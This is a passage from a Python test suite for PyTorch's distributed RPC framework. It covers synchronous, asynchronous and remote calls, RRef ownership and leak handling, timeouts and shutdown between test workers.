n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass(2).my_instance_method, args=(n,)
)
self.assertEqual(ret, MyClass(2).my_instance_method(n))
@dist_init
def test_py_class_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_class_method, args=(n, n + 1)
)
self.assertEqual(ret, MyClass.my_class_method(n, n + 1))
@dist_init
def test_py_class_static_method(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank), MyClass.my_static_method, args=(n + 10,)
)
self.assertEqual(ret, MyClass.my_static_method(n + 10))
@dist_init
def test_py_multi_async_call(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker_info = rpc.get_worker_info(worker_name(dst_rank))
fut1 = rpc.rpc_async(dst_worker_info, MyClass.my_static_method, args=(n + 10,))
fut2 = rpc.rpc_async(dst_worker_info, min, args=(n, n + 1, n + 2))
self.assertEqual(fut1.wait(), MyClass.my_static_method(n + 10))
self.assertEqual(fut2.wait(), min(n, n + 1, n + 2))
@dist_init
def test_py_no_return_result(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(worker_name(dst_rank), no_result)
self.assertEqual(ret, no_result())
@dist_init
def test_py_tensors(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(ret, my_tensor_function(torch.ones(n, n), torch.ones(n, n)))
@dist_init
def test_py_tensors_multi_async_call(self):
futs = []
n = self.rank + 1
dst_rank = n % self.world_size
for i in range(100):
fut = rpc.rpc_async(
worker_name(dst_rank),
my_tensor_function,
args=(torch.ones(i, i), torch.ones(i, i)),
)
futs.append(fut)
j = 0
for val in torch.futures.wait_all(futs):
self.assertEqual(
val, my_tensor_function(torch.ones(j, j), torch.ones(j, j))
)
j += 1
@dist_init
def test_py_tensors_in_container(self):
n = self.rank + 1
dst_rank = n % self.world_size
a = [torch.ones(n, n), torch.ones(n, n)]
b = TensorClass(build_complex_tensors())
c = {"foo": torch.ones(n, n), "bar": torch.ones(n, n)}
ret = rpc.rpc_sync(
worker_name(dst_rank), my_complex_tensor_function, args=(a, b, c)
)
self.assertEqual(ret, my_complex_tensor_function(a, b, c))
@dist_init
def test_py_nested_pickle(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
run_nested_pickle,
args=(MyPickleClass(), torch.ones(2, 2)),
)
m = MyPickleClass()
m.set(my_tensor_function(torch.ones(2, 2), torch.ones(2, 2)))
self.assertEqual(ret, run_nested_pickle(m, torch.ones(2, 2)))
@dist_init
def test_py_function_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
with self.assertRaises(TypeError):
ret = rpc.rpc_sync(worker_name(dst_rank), no_result, args=(10,))
@dist_init
def test_py_raise_in_user_func(self):
with captured_output() as (_, err):
# This barrier prevents a race condition where the main thread has
# not entered the context manager when the remote function runs.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func)
with self.assertRaisesRegex(ValueError, expected_err):
fut.wait()
# This barrier prevents a race condition where the main thread exits
# context manager before the remote function has ran.
dist.barrier()
# Validate that trainers log errors when running functions.
stderr_lines = err.getvalue()
self.assertTrue(expected_err in stderr_lines)
@dist_init
def test_py_raise_in_user_func_escaped_str(self):
n = self.rank + 1
dst_rank = n % self.world_size
fut = rpc.rpc_async(worker_name(dst_rank), raise_func_escape)
try:
fut.wait()
except ValueError as e:
msg = str(e)
# Ensure newlines are unescaped to provide a better repr of error.
self.assertEqual(msg, msg.encode("utf-8").decode("unicode_escape"))
else:
self.assertTrue(False, "expected raise_func_escape to raise ValueError.")
@dist_init
def test_nested_rpc(self):
n = self.rank + 1
dst_rank = n % self.world_size
ret = rpc.rpc_sync(
worker_name(dst_rank),
nested_rpc,
args=(worker_name(self.rank),),
)
self.assertEqual(ret, torch.ones(2, 2) + 1)
def _stress_test_rpc(self, f, repeat=1000, args=()):
n = self.rank + 1
dst_rank = n % self.world_size
futs = []
tik = time.time()
for _ in range(repeat):
fut = rpc.rpc_async(worker_name(dst_rank), f, args=args)
futs.append(fut)
for val in torch.futures.wait_all(futs):
self.assertEqual(val, 0)
tok = time.time()
print(
"Rank {} finished testing {} times in {} seconds.".format(
self.rank, repeat, tok - tik
)
)
@dist_init
def test_stress_light_rpc(self):
self._stress_test_rpc(light_rpc)
@dist_init
def test_stress_heavy_rpc(self):
self._stress_test_rpc(heavy_rpc, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_stress_heavy_rpc_torchscript(self):
self._stress_test_rpc(heavy_rpc_torchscript, repeat=20, args=(torch.ones(100, 100),))
@dist_init
def test_builtin_remote_ret(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
self.assertEqual(rref.to_here(), torch.ones(n, n) * 2)
@dist_init
def test_builtin_remote_self(self):
rref = rpc.remote(
worker_name(self.rank),
torch.add,
args=(torch.ones(2, 2), torch.ones(2, 2)),
)
self.assertEqual(rref.local_value(), torch.ones(2, 2) * 2)
def _test_multi_remote_call(self, fn, args_fn=lambda x: (), kwargs_fn=lambda x: {}):
m = 10
n = self.rank + 1
dst_rank = n % self.world_size
rrefs = []
expected = []
for i in range(m):
n = n + i
rrefs.append(
rpc.remote(
worker_name(dst_rank),
fn,
args=args_fn(n),
kwargs=kwargs_fn(n),
)
)
expected.append(fn(*args_fn(n), **kwargs_fn(n)))
for i in range(m):
self.assertEqual(rrefs[i].to_here(), expected[i])
@dist_init
def test_multi_builtin_remote_ret(self):
def args_fn(n):
return (torch.ones(n, n), torch.ones(n, n))
self._test_multi_remote_call(torch.add, args_fn=args_fn)
@dist_init
def test_py_udf_remote(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank),
my_function,
kwargs={"a": n, "b": n + 1, "c": n + 2},
)
self.assertEqual(rref.to_here(), my_function(n, n + 1, n + 2))
@dist_init
def test_multi_py_udf_remote(self):
def kwargs_fn(n):
return {"a": torch.ones(n, n), "b": torch.ones(n, n), "c": torch.ones(n, n)}
self._test_multi_remote_call(my_function, kwargs_fn=kwargs_fn)
@dist_init
def test_py_rref_args(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init
def test_py_rref_args_user_share(self):
n = self.rank + 1
owner_rank = n % self.world_size
user_rank = (n + 1) % self.world_size
rref_a = rpc.remote(
worker_name(owner_rank), my_function, args=(torch.ones(n, n), 2, 0)
)
rref_b = rpc.remote(
worker_name(owner_rank), my_function, args=(torch.ones(n, n), 1, 0)
)
rref_c = rpc.remote(
worker_name(user_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init
def test_py_rpc_rref_args(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), my_function, args=(torch.ones(n, n), 2, 0)
)
rref_b = rpc.remote(
worker_name(dst_rank), my_function, args=(torch.ones(n, n), 1, 0)
)
c = rpc.rpc_sync(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(c, torch.ones(n, n) + 4)
@dist_init
def test_nested_remote(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.remote(
worker_name(dst_rank1),
nested_remote,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 3)
@dist_init
def test_nested_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref_of_rrefs = rpc.remote(
worker_name(dst_rank1),
nested_rref,
args=(worker_name(dst_rank2),),
)
# Say C has 2 OwnerRRefs.
# B has 2 UserRRefs to those 2 OwnerRRefs, respectively.
# This call is effectively A asking B to share its 2 UserRRefs.
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), torch.ones(2, 2) + 1)
self.assertEqual(rrefs[1].to_here(), torch.ones(2, 2) + 2)
@dist_init
def test_nested_rref_stress(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
all_rrefs = []
for _ in range(20):
all_rrefs.append(
rpc.remote(
worker_name(dst_rank1),
nested_rref,
args=(worker_name(dst_rank2),),
)
)
for i in range(20):
rref_of_rrefs = all_rrefs[i]
rrefs = rref_of_rrefs.to_here()
self.assertEqual(len(rrefs), 2)
self.assertEqual(rrefs[0].to_here(), torch.ones(2, 2) + 1)
self.assertEqual(rrefs[1].to_here(), torch.ones(2, 2) + 2)
@dist_init
def test_multi_layer_nested_async_rpc(self):
# This test will exit right away, but there will be a chain of async
# RPCs. The termination algorithm should detect those messages properly.
# Otherwise, some peer could exit early, leaving others to timeout
# errors or connection closed errors.
ttl = 20
n = self.rank + 1
dst_rank = n % self.world_size
multi_layer_nested_async_rpc(dst_rank, self.world_size, ttl)
@dist_init
def test_remote_with_exception(self):
n = self.rank + 1
dst_rank = n % self.world_size
# check ref to other workers
rref = rpc.remote(worker_name(dst_rank), raise_func)
with self.assertRaises(ValueError):
rref.to_here()
# check ref to itself
rref = rpc.remote(worker_name(self.rank), no_result, args=(10,))
with self.assertRaises(TypeError):
rref.to_here()
@dist_init
def test_rpc_return_rref(self):
n = self.rank + 1
dst_rank1 = n % self.world_size
dst_rank2 = (n + 1) % self.world_size
rref = rpc.rpc_sync(
worker_name(dst_rank1),
rpc_return_rref,
args=(worker_name(dst_rank2),),
)
self.assertEqual(rref.to_here(), torch.ones(2, 2) + 1)
@dist_init
def test_rref_forward_chain(self):
ttl = 8
n = self.rank + 1
dst_rank = n % self.world_size
rref = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
ret_rref = rref_forward_chain(dst_rank, self.world_size, rref, ttl)
for i in range(ttl):
self.assertEqual(len(ret_rref), 1)
ret_rref = ret_rref[0].to_here()
ret = ret_rref
self.assertEqual(ret, torch.add(torch.ones(n, n), 1))
@dist_init
def test_local_rref_no_fork(self):
local_rref = RRef(35)
self.assertEqual(local_rref.local_value(), 35)
@dist_init
def test_local_value_not_on_owner(self):
# ensure that an error message is thrown if a user tries to call
# local_value() on a non-owning node.
next_rank = (self.rank + 1) % self.world_size
rref = rpc.remote(
worker_name(next_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
with self.assertRaisesRegex(
RuntimeError, (
fr"For UserRRef\(rref_id=GloballyUniqueId\(created_on={self.rank}, local_id=0\), "
fr"fork_id=GloballyUniqueId\(created_on={self.rank}, local_id=1\)\), "
r"can't call localValue\(\) on user "
fr"WorkerInfo\(id={self.rank}, name={worker_name(self.rank)}\). "
fr"Call it on owner WorkerInfo\(id={next_rank}, name={worker_name(next_rank)}\)"
)
):
rref.local_value()
@dist_init
def test_return_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_list = rpc.rpc_sync(
worker_name(dst_rank), get_rref_list, args=([1, 2, 3],)
)
for rref in rref_list:
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, 10),
)
rets = [
rpc.rpc_sync(
rref.owner(), _call_method_on_rref, args=(MyClass.get_value, rref)
)
for rref in rref_list
]
self.assertEqual(rets, [11, 12, 13])
@dist_init
def test_rref_type(self):
def launched_rpc(events):
expected_name = "rpc_sync#_rref_typeof_on_owner"
return any([e.name.startswith(expected_name) for e in events])
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, torch.add, args=(torch.ones(2), 1))
with torch.autograd.profiler.profile() as p:
t = rref._get_type()
self.assertTrue(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
with torch.autograd.profiler.profile() as p:
for _ in range(10):
t = rref._get_type()
self.assertFalse(launched_rpc(p.function_events))
self.assertEqual(t, type(torch.ones(2)))
rref = rpc.remote(dst, MyClass, args=(0,))
self.assertEqual(rref._get_type(), MyClass)
@dist_init
def test_rref_type_with_error(self):
dst = worker_name((self.rank + 1) % self.world_size)
# 10 ms timeout
rref = rpc.remote(dst, raise_func)
with self.assertRaisesRegex(ValueError, "Expected error"):
rref._get_type()
@dist_init
def test_rref_type_owner(self):
rref = RRef(torch.ones(2) + 1)
self.assertEqual(rref._get_type(), type(torch.ones(2)))
rref = RRef(MyClass(0))
self.assertEqual(rref._get_type(), MyClass)
@staticmethod
def _slow_add(x, y):
time.sleep(1)
return x + y
@dist_init
def test_rref_type_slow_init(self):
dst = worker_name((self.rank + 1) % self.world_size)
rref = rpc.remote(dst, RpcTest._slow_add, args=(torch.ones(2), 1))
self.assertEqual(rref._get_type(), type(torch.ones(2)))
@dist_init
def test_owner_equality(self):
a = RRef(40)
b = RRef(50)
other_rank = (self.rank + 1) % self.world_size
other_a = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_b = rpc.remote(
worker_name(other_rank), torch.add, args=(torch.ones(1), 1)
)
other_a.to_here() # to ensure clean termination
other_b.to_here()
self.assertNotEqual(a.owner(), 23)
self.assertEqual(other_a.owner(), other_b.owner())
self.assertNotEqual(a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_a.owner())
self.assertEqual(other_a.owner(), other_b.owner())
self.assertEqual(a.owner(), a.owner())
self.assertEqual(a.owner(), b.owner())
self.assertEqual(a.owner(), rpc.get_worker_info())
x = dict()
x[a.owner()] = a
x[other_a.owner()] = other_a
self.assertEqual(x[a.owner()], a)
self.assertEqual(x[b.owner()], a)
self.assertEqual(x[other_a.owner()], other_a)
self.assertEqual(x[other_b.owner()], other_a)
self.assertEqual(len(x), 2)
@dist_init
def test_pass_local_rrefs(self):
n = self.rank + 1
dst_rank = n % self.world_size
dst_worker = worker_name(dst_rank)
rref = RRef(40)
self.assertEqual(
rpc.rpc_sync(dst_worker, add_rref_to_value, args=(rref, 50)), 90
)
self.assertEqual(
rpc.rpc_async(dst_worker, add_rref_to_value, args=(rref, 50)).wait(), 90
)
self.assertEqual(
rpc.remote(dst_worker, add_rref_to_value, args=(rref, 50)).to_here(), 90
)
@dist_init
def test_remote_same_worker(self):
n = self.rank + 1
dst_rank = n % self.world_size
rref_a = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 2)
)
rref_b = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(n, n), 1)
)
rref_c = rpc.remote(
worker_name(dst_rank), my_rref_function, args=(rref_a, rref_b)
)
self.assertEqual(rref_c.to_here(), torch.ones(n, n) + 4)
@dist_init(setup_rpc=True)
def test_call_method_on_rref(self):
"""
Tests that it is possible to call an instance method on a remote objet
by using rref.owner() as destination of the call.
"""
vals = [10, 2, 5, 7]
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# creates a remote object
rref = rpc.remote(dst_worker, MyClass, args=(vals[0],))
# modifies state of the remote object
rpc.rpc_sync(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[1]),
)
rpc.rpc_async(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[2]),
).wait()
rpc.remote(
rref.owner(),
_call_method_on_rref,
args=(MyClass.increment_value, rref, vals[3]),
).to_here()
# queries state of the remote object
result = rpc.rpc_sync(
dst_worker, _call_method_on_rref, args=(MyClass.get_value, rref)
)
self.assertEqual(result, sum(vals))
# Notice `rpc.api.shutdown()` accesses
# `_delete_all_user_and_unforked_owner_rrefs` through
# `torch.distributed.rpc.api`, so patching
# `torch.distributed.rpc._delete_all_user_and_unforked_owner_rrefs` will
# not help.
@mock.patch.object(torch.distributed.rpc.api, "_delete_all_user_and_unforked_owner_rrefs")
def _test_rref_leak(self, _mock_delete_all_user_and_unforked_owner_rrefs, ignore_leak):
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Wait for all init to complete.
dist.barrier()
rref = rpc.remote(
worker_name((self.rank + 1) % self.world_size),
torch.add,
args=(torch.ones(2, 2), 1),
)
import torch.distributed.rpc.api as api
if ignore_leak:
api._ignore_rref_leak = True
rpc.shutdown(graceful=True)
else:
api._ignore_rref_leak = False
with self.assertRaisesRegex(RuntimeError, "Leaking RRef"):
rpc.shutdown(graceful=True)
@dist_init(setup_rpc=False)
def test_rref_leak(self):
self._test_rref_leak(ignore_leak=False)
@dist_init(setup_rpc=False)
def test_ignore_rref_leak(self):
self._test_rref_leak(ignore_leak=True)
@dist_init
def test_rref_str(self):
rref1 = RRef(self.rank)
id_class = "GloballyUniqueId"
self.assertEqual(
"OwnerRRef({}(created_on={}, local_id=0))".format(id_class, self.rank), rref1.__str__()
)
dst_rank = (self.rank + 1) % self.world_size
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
self.assertEqual(
rref2.__str__(),
"UserRRef(RRefId = {0}(created_on={1}, local_id=1), ForkId = {0}(created_on={1}, local_id=2))".format(
id_class, self.rank
),
)
@dist_init
def test_rref_get_future(self):
# Tests that we can obtain the future corresponding to the creation of
# the RRef on remote end
if self.rank == 0:
# Builtin
rref = rpc.remote(worker_name(1), torch.add, args=(1, 1))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# UDF
rref = rpc.remote(worker_name(1), foo_add, args=())
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
# Script
rref = rpc.remote(worker_name(1), my_script_func, args=(torch.tensor(1), ))
rref.to_here()
fut = rref._get_future()
self.assertIsInstance(fut, torch._C.Future)
@dist_init
def test_rref_context_debug_info(self):
# This test checks local states that are modified by remote workers.
# This means that we would need barrier before and after every check.
# The barrier before the check makes sure that all previous states are
# cleared globally, the barrier after ensures that no following states
# change gets into the current check.
initialize_pg(self.file_init_method, self.rank, self.world_size)
# Check 1: local RRef does not update owners_ map or add a pending user.
#################################################
rref1 = RRef(self.rank)
# don't need a barrier here as local RRef is handled by this thread
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertIn("num_pending_users", info)
# RRef on local value is not added to context until shared across RPC
self.assertEqual(0, int(info["num_owner_rrefs"]))
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after the check 1
dist.barrier()
# Check 2: Sharing RRef as an arg should update owners_ map
###########################################################
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(worker_name(dst_rank), set_global_rref, args=(rref1,))
# barrier before check 2
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(1, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 2
dist.barrier()
# clear states for check 2
rpc.rpc_sync(worker_name(dst_rank), clear_global_rref)
# Check 3: rpc.remote call should update owners_ map
####################################################
rref2 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref3 = rpc.remote(
worker_name(dst_rank), torch.add, args=(torch.ones(2, 2), 1)
)
rref2.to_here()
rref3.to_here()
# barrier before check 3
wait_until_pending_futures_and_users_flushed()
dist.barrier()
info = _rref_context_get_debug_info()
self.assertIn("num_owner_rrefs", info)
self.assertEqual(2, int(info["num_owner_rrefs"]))
# no pending users since the fork is finished
self.assertEqual(0, int(info["num_pending_users"]))
# barrier after check 3
dist.barrier()
@dist_init
def test_disable_gil_profiling(self):
# test that rpc.enable_gil_profiling(false) will result in
# GIL wait time not being recorded.
# GIL profiling should be disabled by default.
dst_rank = (self.rank + 1) % self.world_size
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertRaises(KeyError, lambda: info["agent.gil_average_wait_time_us"])
rpc.enable_gil_profiling(True)
rpc.rpc_sync(
worker_name(dst_rank), torch.add, args=(torch.ones(1), torch.ones(1))
)
info = rpc.api._get_current_rpc_agent().get_debug_info()
self.assertIn("agent.gil_average_wait_time_us", info)
@dist_init(setup_rpc=False)
def test_local_shutdown(self):
# test that we can start RPC and then immediately locally shutdown
# without sending any messages.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init
def test_debug_info(self):
# only test keys in this test case. Values should be covered by
# individual module debug info tests
import torch.distributed.autograd as dist_autograd
info = _get_debug_info()
rref_info = _rref_context_get_debug_info()
agent_info = rpc.api._get_current_rpc_agent().get_debug_info()
autograd_info = dist_autograd._get_debug_info()
common_keys = rref_info.keys() & agent_info.keys() & autograd_info.keys()
self.assertEqual(0, len(common_keys))
expected = {}
expected.update(rref_info)
expected.update(agent_info)
expected.update(autograd_info)
# NB: Key ordering is only preserved in python 3.6+. So here, we
# manually check keys are equal.
for key in expected.keys():
self.assertIn(key, info.keys())
for key in info.keys():
self.assertIn(key, expected.keys())
@dist_init(setup_rpc=False)
@unittest.skipIf(
IS_MACOS,
"Test is flaky on MacOS since libuv error handling is not as robust as TCP",
)
def test_handle_send_exceptions(self):
# test that if a callee node has gone down, we raise an appropriate
# exception instead of just crashing.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
rpc._set_rpc_timeout(10)
# This barrier is needed to ensure that some workers do not exit before
# others have been brought up, for non ProcessGroupAgent backends.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
if self.rank == 1:
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
# allow destination worker to exit without joining
error_str = self.get_shutdown_error_regex()
wait_until_node_failure(dst_rank, error_str)
fut = rpc.rpc_async(dst_worker, torch.add, args=(torch.ones(1), 3))
# Shutdown sequence is not very well defined and as a result
# we can see any of the error messages defined in get_shutdown_error_regex.
with self.assertRaisesRegex(RuntimeError, error_str):
fut.wait()
# exit all workers non-gracefully.
rpc.shutdown(graceful=False)
@dist_init
def test_deadlock(self):
# this test is copied from https://github.com/pytorch/pytorch/issues/45089
if self.rank == 1:
dst1 = worker_name((self.rank + 1) % self.world_size)
x = torch.ones(2)
y = torch.ones(2)
rpc.rpc_async(dst1, RpcTest._slow_add, args=(x, y), timeout=15).wait()
dist_initialized = dist.is_initialized()
if not dist_initialized:
dist.init_process_group(
backend="gloo",
init_method=self.file_init_method,
rank=self.rank,
world_size=self.world_size,
)
@dist_init(setup_rpc=False)
def test_local_shutdown_with_rpc(self):
# test that we can start RPC, send RPCs, and then run local shutdown.
rpc.init_rpc(
name="worker%d" % self.rank,
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options,
)
n = self.rank + 1
dst_rank = n % self.world_size
rpc.rpc_sync(
worker_name(dst_rank),
torch.add,
args=(torch.ones(n, n), torch.ones(n, n)),
)
# A barrier is needed to ensure that all RPCs are processed.
# Otherwise, some RPCs can timeout since the receiving end
# has terminated.
initialize_pg(self.file_init_method, self.rank, self.world_size)
dist.barrier()
# pass in graceful=False to ensure that we don't wait for other workers.
rpc.shutdown(graceful=False)
@dist_init(setup_rpc=False)
def test_set_and_get_default_rpc_timeout(self):
timeout = 0.5
# A new `RpcBackendOptions` is constructed
# when accessing `self.rpc_backend_options`.
rpc_backend_options = self.rpc_backend_options
rpc_backend_options.rpc_timeout = timeout
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=rpc_backend_options,
)
set_timeout = rpc.get_rpc_timeout()
self.assertEqual(timeout, set_timeout)
rpc.shutdown()
@dist_init
def test_default_timeout_used(self):
"""
Tests that if no timeout is passed into rpc_async and rpc_sync, then the
default timeout is used.
"""
dst_rank = (self.rank + 1) % self.world_size
rpc._set_rpc_timeout(0.001) # 1 ms
# futures should time out and be marked with an exception indicating it as such.
futs = [
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=())
for _ in range(10)
]
expected_error = self.get_timeout_error_regex()
for fut in futs:
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# ensure that if a new timeout is set old futures don't time out but new ones do.
rpc._set_rpc_timeout(200) # 200 seconds
# create a longstanding RPC.
fut1 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
# now, set a short timeout.
rpc._set_rpc_timeout(0.001)
# fut2 should time out, fut1 should not.
fut2 = rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut2.wait()
fut1.wait()
# Zero timeout means infinity, so future should run to completion.
rpc._set_rpc_timeout(0)
rpc.rpc_async(worker_name(dst_rank), my_sleep_func, args=()).wait()
# reset to default timeout so shutdown messages can process cleanly.
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
@dist_init
def test_rpc_timeouts(self):
# TODO: enable timeouts for rpc.remote/RRef (https://github.com/pytorch/pytorch/issues/33803)
dst_rank = (self.rank + 1) % self.world_size
dst_worker = worker_name(dst_rank)
timeout = 0.1 # 100 ms
expected_error = self.get_timeout_error_regex()
# Test async UDF
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,)).wait()
# Test sync UDF
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=timeout)
# Ensure run to completion if there is no timeout and we use the default
# RPC timeout.
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# If we set a default timeout for RPCs, it should be respected, though
# still overridden if we pass in a different timeout to the APIs.
rpc._set_rpc_timeout(0.001)
fut = rpc.rpc_async(dst_worker, my_sleep_func, args=(1,))
with self.assertRaisesRegex(RuntimeError, expected_error):
fut.wait()
with self.assertRaisesRegex(RuntimeError, expected_error):
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,))
# The RPCs should run to completion since we override the timeout.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=5).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=5)
# Passing in a zero timeout should ensure that the RPC won't time out.
rpc.rpc_async(dst_worker, my_sleep_func, args=(1,), timeout=0).wait()
rpc.rpc_sync(dst_worker, my_sleep_func, args=(1,), timeout=0)
# Reset for clean shutdown
rpc._set_rpc_timeout(rpc.constants.DEFAULT_RPC_TIMEOUT_SEC)
def test_dist_init_decorator(self):
@dist_init(setup_rpc=False)
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
@dist_init
def test_func(self):
return "expected result"
self.assertEqual(test_func(self), "expected result")
def test_use_rpc_pickler(self):
class TestPickler:
pass
test_pickler = TestPickler()
with _use_rpc_pickler(test_pickler):
self.assertTrue(torch.distributed.rpc.api._default_pickler is test_pickler)
self.assertTrue(
torch.distributed.rpc.api._default_pickler is _internal_rpc_pickler
)
@dist_init
def test_wait_all(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, torch.add, (torch.ones(2, 2), 1))
self.assertTrue(len(_thread_local_var.future_list) == 1)
self.assertTrue(isinstance(_thread_local_var.future_list[0], torch._C.Future))
self.assertTrue(fut.done())
self.assertEqual(fut.wait(), torch.ones(2, 2) + 1)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_multiple_call(self):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
for i in range(20):
fut = rpc.rpc_async(dst, torch.add, (torch.ones(i, i), 1))
res = rpc.rpc_sync(dst, torch.add, (torch.ones(i, i), 1))
self.assertEqual(res, torch.ones(i, i) + 1)
self.assertEqual(fut.wait(), torch.ones(i, i) + 1)
self.assertTrue(len(_thread_local_var.future_list) == 20)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_timeout(self):
expected_error = self.get_timeout_error_regex()
with self.assertRaisesRegex(RuntimeError, expected_error):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
timeout = 0.1 # 100 ms
fut = rpc.rpc_async(dst, my_sleep_func, args=(1,), timeout=timeout)
self.assertFalse(hasattr(_thread_local_var, "future_list"))
@dist_init
def test_wait_all_raise_in_user_func(self):
with self.assertRaises(ValueError):
with _wait_all():
self.assertTrue(_thread_local_var.future_list == [])
dst = worker_name((self.rank + 1) % self.world_size)
fut = rpc.rpc_async(dst, raise_func)
